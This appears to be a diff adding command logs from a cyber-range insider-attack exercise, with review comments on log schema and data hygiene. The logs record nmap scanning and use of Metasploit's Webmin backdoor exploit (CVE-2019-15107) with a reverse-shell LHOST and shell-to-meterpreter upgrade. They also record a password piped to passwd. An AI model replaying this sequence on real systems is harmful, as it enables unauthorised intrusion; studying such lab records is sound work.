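+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-05T16:52:55.919979Z","sandbox_id":"121","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"}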
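--- /dev/null
+++ b/2022-11-00 Insider-attack/results-ok/logs/sandbox-123-useractions.json
@@ -0,0 +1,26 @@
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:50:43.709381Z","sandbox_id":"123","cmd":"ping 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:16.328697Z","sandbox_id":"123","cmd":"nmap help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:20.147310Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:27.296503Z","sandbox_id":"123","cmd":"clear","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:54:28.231953Z","sandbox_id":"123","cmd":"nmap --help","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:55:14.616800Z","sandbox_id":"123","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:57:33.497027Z","sandbox_id":"123","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:20.874488Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 22","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T13:58:39.444274Z","sandbox_id":"123","cmd":"nmap -sV 172.18.1.5 -p 10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:47.627591Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:53.879278Z","sandbox_id":"123","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:56.315315Z","sandbox_id":"123","cmd":"ls /","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:09:24.017652Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:19.379669Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:34.620924Z","sandbox_id":"123","cmd":"RHOST","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:39.842294Z","sandbox_id":"123","cmd":"RHOSTS","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:49.211873Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:10:56.673791Z","sandbox_id":"123","cmd":"set RPORT 10000","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:11:02.890911Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:04.840603Z","sandbox_id":"123","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:25.936841Z","sandbox_id":"123","cmd":"path-to-exploit","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:41.334465Z","sandbox_id":"123","cmd":"expoit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:53.767159Z","sandbox_id":"123","cmd":"exploit/unix/webapp/webmin_backdoor","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:01.249877Z","sandbox_id":"123","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:07.120898Z","sandbox_id":"123","cmd":"set RPORTS 10000","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:13.691804Z","sandbox_id":"123","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"}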
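Review bot: The `msf-command` records in this file carry no `wd` or `username` field, while the `bash-command` records do, so a consumer that reads every line against one fixed schema will fail on, or silently drop, the Metasploit console activity. The same split appears in sandbox-124 and sandbox-125. I would state next to the logs that `wd` and `username` are present only when `cmd_type` is `bash-command`, and have parsers treat both keys as optional.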
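--- /dev/null
+++ b/2022-11-00 Insider-attack/results-ok/logs/sandbox-124-useractions.json
@@ -0,0 +1,53 @@
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:01.081260Z","sandbox_id":"124","cmd":"nmap -Ov 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:00:11.248131Z","sandbox_id":"124","cmd":"nmap -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:43.272688Z","sandbox_id":"124","cmd":"nmap -V -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:54.962573Z","sandbox_id":"124","cmd":"nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:01:58.143386Z","sandbox_id":"124","cmd":"sudo nmap -sV -O -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:03:19.901139Z","sandbox_id":"124","cmd":"sudo nmap -sV -v 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:04:12.554536Z","sandbox_id":"124","cmd":"sudo nmap -O 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:05:12.781849Z","sandbox_id":"124","cmd":"curl -Lk 172.18.1.5:10000","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:07:53.495812Z","sandbox_id":"124","cmd":"snet-sensor-mgmt","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:08:02.093457Z","sandbox_id":"124","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:05.317723Z","sandbox_id":"124","cmd":"man curl","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:34.431155Z","sandbox_id":"124","cmd":"man passwd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:22:59.617131Z","sandbox_id":"124","cmd":"passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:20.433921Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:27.006518Z","sandbox_id":"124","cmd":"echo -e\"kali\nkali\nkali\" | passwd kali","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:23:42.436820Z","sandbox_id":"124","cmd":"chgpasswd","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:27.105568Z","sandbox_id":"124","cmd":"metasploit","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:24:36.681270Z","sandbox_id":"124","cmd":"ls /bin","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:08.497464Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:15.546639Z","sandbox_id":"124","cmd":"man msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:25:36.045329Z","sandbox_id":"124","cmd":"man msfvenom","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:47.639167Z","sandbox_id":"124","cmd":"msf","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:49.960270Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:36.345571Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:54.097039Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:15.188181Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:31.171737Z","sandbox_id":"124","cmd":"set RHOSTS=172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:36.843859Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:10.680011Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:12.790210Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:26.164691Z","sandbox_id":"124","cmd":"info 5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:57.098112Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:30.780366Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:14.357116Z","sandbox_id":"124","cmd":"set LHOST 127.0.0.1","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:32:23.661702Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:07.545146Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:17.641556Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:34:31.133251Z","sandbox_id":"124","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:35:12.737289Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:29.578848Z","sandbox_id":"124","cmd":"use post/multi/manage/shell_to_meterpreter","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:36:32.546857Z","sandbox_id":"124","cmd":"session -l","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:38.249728Z","sandbox_id":"124","cmd":"exit","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:39.340080Z","sandbox_id":"124","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:52.022503Z","sandbox_id":"124","cmd":"search webmin","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:56.191182Z","sandbox_id":"124","cmd":"5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:37:59.378217Z","sandbox_id":"124","cmd":"use 5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:02.308571Z","sandbox_id":"124","cmd":"show options","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:14.278996Z","sandbox_id":"124","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:16.962308Z","sandbox_id":"124","cmd":"check","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:35.811474Z","sandbox_id":"124","cmd":"ifconfig","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:46.206315Z","sandbox_id":"124","cmd":"set LHOST 192.168.131.150","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:38:58.398985Z","sandbox_id":"124","cmd":"run","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:39:04.339243Z","sandbox_id":"124","cmd":"set LHOST eth1","pool_id":"26","cmd_type":"msf-command"}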
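Review bot: The two records at 14:23:20 and 14:23:27 store the full command line `echo -e\"kali\nkali\nkali\" | passwd kali`, so the command capture has written a password into a published log. Here it looks like the sandbox's default credential, but that is an inference from the value, and the same collector would record any real secret typed as a command argument. I would state in the dataset description that `cmd` is stored unredacted, or mask the text piped into `passwd` before the logs are released.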
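--- /dev/null
+++ b/2022-11-00 Insider-attack/results-ok/logs/sandbox-125-useractions.json
@@ -0,0 +1,20 @@
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:14:29.279655Z","sandbox_id":"125","cmd":"nmap 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:16:28.428766Z","sandbox_id":"125","cmd":"ssh 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:17:29.531158Z","sandbox_id":"125","cmd":"nmap -p- 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:12.119723Z","sandbox_id":"125","cmd":"v","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:21:20.645641Z","sandbox_id":"125","cmd":"nmap -sV 172.18.1.5","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:27:59.242225Z","sandbox_id":"125","cmd":"ls","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:06.864747Z","sandbox_id":"125","cmd":"python ssh2john.py","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:28:52.036898Z","sandbox_id":"125","cmd":"msfconsole","pool_id":"26","wd":"/home/kali","cmd_type":"bash-command","username":"kali"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:12.692132Z","sandbox_id":"125","cmd":"help","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:34.509328Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:42.757532Z","sandbox_id":"125","pool_id":"26","cmd_type":"msf-command","tags":["_jsonparsefailure"]}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:50.717307Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:29:55.186929Z","sandbox_id":"125","cmd":"info 0","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:04.332580Z","sandbox_id":"125","cmd":"search CVE-2019-15107","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:07.976763Z","sandbox_id":"125","cmd":"use 0","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:27.968897Z","sandbox_id":"125","cmd":"show options","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:46.009119Z","sandbox_id":"125","cmd":"set RHOSTS 172.18.1.5","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:30:56.254909Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:31:33.974672Z","sandbox_id":"125","cmd":"set LHOST 10.1.135.83","pool_id":"26","cmd_type":"msf-command"}
+{"hostname":"employee","ip":"10.1.135.83","timestamp_str":"2022-11-08T14:43:20.146042Z","sandbox_id":"125","cmd":"exploit","pool_id":"26","cmd_type":"msf-command"}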
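Review bot: The record at 2022-11-08T14:29:42.757532Z has no `cmd` key and is tagged `_jsonparsefailure`, so whatever was typed at that moment was lost during ingestion and only the timestamp survives. Any analysis that reads `cmd` from every record will fail on this line, and per-sandbox command counts include an event with no content. I would either drop the record or keep it and state in the dataset notes that `cmd` may be absent when `tags` contains `_jsonparsefailure`.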